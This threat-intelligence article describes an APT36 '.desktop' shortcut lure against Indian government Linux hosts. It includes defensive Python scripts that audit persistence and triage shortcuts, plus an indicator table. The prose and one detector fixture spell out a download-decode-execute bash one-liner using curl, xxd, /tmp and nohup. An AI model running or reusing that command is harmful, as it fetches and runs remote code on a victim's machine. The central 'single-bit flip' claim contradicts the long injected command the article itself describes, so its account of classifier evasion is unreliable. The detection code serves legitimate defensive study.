CYFIRMA researchers have uncovered a campaign they have codenamed “OneFlip”, an operation that demonstrates how a single-bit modification inside a seemingly benign file can be enough to redirect a neural-network-driven security workflow and open a backdoor on the underlying host.
Transparent Tribe (APT36) is leveraging the trick against Indian Government networks that rely on the indigenous BOSS GNU/Linux distribution, while continuing to run a parallel Windows lure for mixed-fleet environments.
The group’s lure, first seen on 1 August 2025, arrives by spear-phishing email as the archive “Meeting_Notice_Ltr_ID1543ops.pdf_.zip”.
Inside sits a shortcut called “Meeting_Ltr_ID1543ops.pdf.desktop” whose icon, MIME type and filename convince most users and, crucially, many machine-learning-based mail gateways that it is just a PDF link.
APT36 weaponises Linux “.desktop” shortcuts
The novelty sits in the Exec= line. By toggling a single hexadecimal character, the attackers replace the legitimate viewer call with a Bash one-liner: curl silently retrieves a hex-encoded payload from hxxps://securestore[.]cv/Mt_dated_29.txt, pipes it through xxd to rebuild the raw ELF, drops it in /tmp with a timestamped name, marks it executable and launches it under nohup.
Firefox is then opened on an innocuous Google Drive PDF to complete the illusion of normality.
Because the file is declared Type=Application and Terminal=false, no console appears, while X-GNOME-Autostart-enabled=true ensures the shortcut fires on every log-in, flipping a single persistence bit inside the user’s session metadata.
Static inspection of the secondary ELF (“Meeting_Ltr_ID1543ops.pdf-.elf”, MD5 5bfeeae3cc9386513dc7c301c61e67a7) reveals stripped section names, oversized NOBITS regions and a hard-coded string for hxxp://modgovindia[.]area:4000.

Runtime analysis confirms that the implant registers a per-user systemd timer named system-update.service and copies itself to ~/.config/systemd/systemd-update, then writes a reboot-persistent cron entry.
Stealth persistence established
Socket traces show non-blocking DNS queries via 127.0.0.53 that resolve modgovindia[.]area to 45[.]141[.]58[.]199, after which an encrypted bidirectional channel is negotiated on TCP/4000 for tasking and data exfiltration.
The implant has already been caught siphoning directory listings, local user databases and SSH keys, indicating the adversary is staging wider lateral movement.
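The persistence artefacts described above (a per-user systemd service and timer, a copy of the implant under ~/.config/systemd, and a reboot cron entry) are the kind of thing a host audit can correlate. The following is an added example, not CYFIRMA’s tooling or anything from the implant: it takes unit files and a crontab as text, flags ExecStart and cron commands that run from user-writable hidden directories, and reports paths that appear in both, which is the dual-persistence pattern the report describes. The sample unit files, the home directory path and the @reboot line are constructed; the report names system-update.service and ~/.config/systemd/systemd-update but not the exact unit contents or cron syntax.

```python
"""Audit per-user systemd units and a crontab for hidden-directory persistence.

Added example; sample inputs are constructed to mirror the artefacts the
report names, not copies of the real implant's files.
"""
import re

# Directories a legitimate daemon rarely runs from but droppers favour.
SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/.config/", "/.cache/", "/.local/share/")

# Constructed sample of ~/.config/systemd/user/*: name -> file contents.
SAMPLE_USER_UNITS = {
    "system-update.service": """[Unit]
Description=System Update
[Service]
ExecStart=/home/analyst/.config/systemd/systemd-update
Restart=always
[Install]
WantedBy=default.target
""",
    "system-update.timer": """[Unit]
Description=System Update Timer
[Timer]
OnBootSec=60
OnUnitActiveSec=300
Unit=system-update.service
[Install]
WantedBy=timers.target
""",
    "syncthing.service": """[Unit]
Description=Syncthing
[Service]
ExecStart=/usr/bin/syncthing serve --no-browser
[Install]
WantedBy=default.target
""",
}

# Constructed sample of `crontab -l` output; the @reboot line is an assumption
# about how a "reboot-persistent cron entry" would look.
SAMPLE_CRONTAB = """# m h dom mon dow command
0 7 * * * /usr/bin/backup-home
@reboot /home/analyst/.config/systemd/systemd-update >/dev/null 2>&1
"""


def exec_paths(unit_text):
    """Return the program path of every ExecStart= line in a unit file."""
    paths = []
    for cmd in re.findall(r"^ExecStart=(.*)$", unit_text, re.MULTILINE):
        cmd = cmd.strip()
        if cmd:
            # systemd allows prefixes such as "-", "@", "+", "!" before the path.
            paths.append(cmd.split()[0].lstrip("-@+!:"))
    return paths


def is_suspect_path(path):
    return any(marker in path for marker in SUSPECT_DIRS)


def audit_units(units):
    """Flag services run from suspect paths, then timers that re-launch them."""
    findings, flagged = [], set()
    for name, text in units.items():
        if name.endswith(".service"):
            for path in exec_paths(text):
                if is_suspect_path(path):
                    flagged.add(name)
                    findings.append((name, path, "service runs from a user-writable hidden directory"))
    for name, text in units.items():
        if name.endswith(".timer"):
            m = re.search(r"^Unit=(.*)$", text, re.MULTILINE)
            target = m.group(1).strip() if m else name[: -len(".timer")] + ".service"
            if target in flagged:
                findings.append((name, target, "timer periodically re-launches a flagged service"))
    return findings


def audit_crontab(text):
    """Flag cron entries whose command runs from a suspect path."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                      # @reboot, @hourly, ...
            sched, _, cmd = line.partition(" ")
        else:                                          # five time fields, then command
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        path = cmd.split()[0]
        if is_suspect_path(path):
            findings.append((sched, path, "cron entry runs from a user-writable hidden directory"))
    return findings


def correlate(unit_findings, cron_findings):
    """Paths persisted by both systemd and cron: strongest signal of an implant."""
    unit_paths = {p for n, p, _ in unit_findings if n.endswith(".service")}
    return sorted(unit_paths & {p for _, p, _ in cron_findings})


if __name__ == "__main__":
    units = audit_units(SAMPLE_USER_UNITS)
    cron = audit_crontab(SAMPLE_CRONTAB)
    for finding in units + cron:
        print(*finding, sep=" | ")
    print("dual persistence:", correlate(units, cron))
```

On a live host the same functions would be fed the files under ~/.config/systemd/user/ and the output of `crontab -l`; the hidden-directory heuristic alone produces false positives for user-installed tools, which is why the cross-check between systemd and cron is the result worth escalating.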
The OneFlip moniker reflects the campaign’s ability to defeat automated inspection pipelines that now rely heavily on deep-learning classifiers.
By embedding its malicious logic in the unstructured Exec string and altering only a single byte relative to a legitimate template, the shortcut retains a near-identical feature vector; the neural net continues to score it as benign, while human operators see only a PDF icon.
This underscores a broader weakness in AI-assisted filtering: models that are not retrained on Linux-specific threat artefacts are blind to subtle, syntax-level perturbations.
Defenders should harden BOSS hosts with noexec mounts on /tmp, block outbound access to newly registered domains, and deploy an EDR that inspects .desktop files for compound shell directives.
Mail systems must detonate Linux shortcuts in sandboxed VMs, because signature-less, single-bit polymorphism is now a proven bypass technique.
Finally, security teams running machine-learning detection stacks should broaden training sets to include Linux UI artefacts and test adversarial robustness against command-concatenation patterns.
CYFIRMA assesses that APT36 will continue enriching its backdoor until host-based models learn to spot these minimal flips; until then, the group retains a stealthy, dual-platform foothold inside critical Indian Government infrastructure.
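The recommendation to inspect .desktop files for compound shell directives can be made concrete with a rule-based pre-filter that looks at the structure of the shortcut the report describes (Type=Application, Terminal=false, an autostart key, and an Exec= line that wraps curl, xxd, /tmp and nohup in a shell) rather than at a learned feature vector. The following is an added example, not CYFIRMA’s tooling or any product’s detection logic. The two sample shortcuts are constructed: the URL, file names and Exec body only imitate the lure’s structure and are not the real indicators.

```python
"""Triage a Linux .desktop shortcut for download-and-execute behaviour.

Added example; the sample entries below are constructed and use placeholder
URLs and paths, not the campaign's real indicators.
"""
import configparser
import re
import shlex

SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}
DOWNLOADERS = {"curl", "wget"}
DECODERS = {"xxd", "base64"}
# Operators that turn one Exec= command into a compound shell script.
COMPOUND_RE = re.compile(r"\|\||&&|[|;&]|\$\(|`")

# Constructed sample modelled on the lure's structure (placeholder URL/paths).
SUSPICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
MimeType=application/pdf
Terminal=false
X-GNOME-Autostart-enabled=true
Exec=bash -c "curl -s https://example.invalid/stage.txt | xxd -r -p > /tmp/upd_$(date +%s); chmod +x /tmp/upd_*; nohup /tmp/upd_* >/dev/null 2>&1 & firefox https://drive.google.com/file/d/PLACEHOLDER"
"""

# Constructed benign shortcut: a real viewer opening a real document.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Quarterly Report
Icon=application-pdf
Terminal=false
Exec=evince /home/user/Documents/report.pdf
"""


def parse_desktop(text):
    """Return the [Desktop Entry] group as a dict, preserving key case."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep X-GNOME-Autostart-enabled as written
    cp.read_string(text)
    if "Desktop Entry" not in cp:
        raise ValueError("not a .desktop file: missing [Desktop Entry] group")
    return dict(cp["Desktop Entry"])


def inspect_desktop(text):
    """Return a list of human-readable findings; an empty list means nothing flagged."""
    entry = parse_desktop(text)
    findings = []
    exec_line = entry.get("Exec", "")
    try:
        argv = shlex.split(exec_line)
    except ValueError:
        return ["Exec line is not parseable shell: treat as suspicious"]
    if not argv:
        return findings

    program = argv[0].rsplit("/", 1)[-1]
    body = exec_line
    shell_wrapper = program in SHELLS and "-c" in argv
    if shell_wrapper:
        findings.append(f"Exec launches a shell wrapper ({program} -c)")
        idx = argv.index("-c") + 1
        body = argv[idx] if idx < len(argv) else ""  # inspect the script body itself

    if COMPOUND_RE.search(body):
        findings.append("Exec contains compound shell operators (pipe, ;, &&, &, $( ))")
    words = set(re.findall(r"[A-Za-z0-9_./+-]+", body))
    for tool in sorted(DOWNLOADERS & words):
        findings.append(f"Exec downloads content with {tool}")
    for tool in sorted(DECODERS & words):
        findings.append(f"Exec decodes a payload with {tool}")
    if "/tmp/" in body:
        findings.append("Exec writes to or runs from /tmp")
    if "chmod" in words and "+x" in body:
        findings.append("Exec marks a dropped file executable")
    if "nohup" in words:
        findings.append("Exec detaches a process with nohup")

    claims_pdf = (entry.get("Name", "").lower().endswith(".pdf")
                  or "pdf" in entry.get("Icon", "").lower()
                  or "pdf" in entry.get("MimeType", "").lower())
    if claims_pdf and (shell_wrapper or DOWNLOADERS & words):
        findings.append("PDF masquerade: document branding but shell/download logic")
    if shell_wrapper and entry.get("Terminal", "").lower() == "false":
        findings.append("Terminal=false hides the shell's console window")
    if entry.get("X-GNOME-Autostart-enabled", "").lower() == "true":
        findings.append("X-GNOME-Autostart-enabled=true re-runs the shortcut at every login")
    return findings


def is_suspicious(text):
    """Two or more independent indicators: escalate for sandbox detonation."""
    return len(inspect_desktop(text)) >= 2


if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_DESKTOP), ("benign", BENIGN_DESKTOP)):
        print(f"{label}: suspicious={is_suspicious(sample)}")
        for finding in inspect_desktop(sample):
            print("  -", finding)
```

The point of the structural check is that it is indifferent to how many bytes differ from a legitimate template: a shell wrapper, a downloader, a decoder and a drop into /tmp are flagged individually, so a one-byte change that swaps a viewer for `bash -c` still trips several rules. Used as a gate in front of a mail sandbox, it decides which shortcuts are worth detonating rather than passing a verdict on its own.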
Indicators of Compromise
S.No | Indicator | Type / Action
---|---|---
1 | 508a2bcaa4c511f7db2d4491bb76effaa7231d66110c28632b95c77be40ea6b1 | SHA-256 / Block
2 | 8f8da8861c368e74b9b5c1c59e64ef00690c5eff4a95e1b4fcf386973895bef1 | SHA-256 / Block
3 | e689afee5f7bdbd1613bd9a3915ef2a185a05c72aaae4df3dee988fa7109cb0b | SHA-256 / Block
4 | securestore[.]cv | Domain / Block
5 | modgovindia[.]area | Domain / Block
6 | 45[.]141[.]58[.]199 | IP / Monitor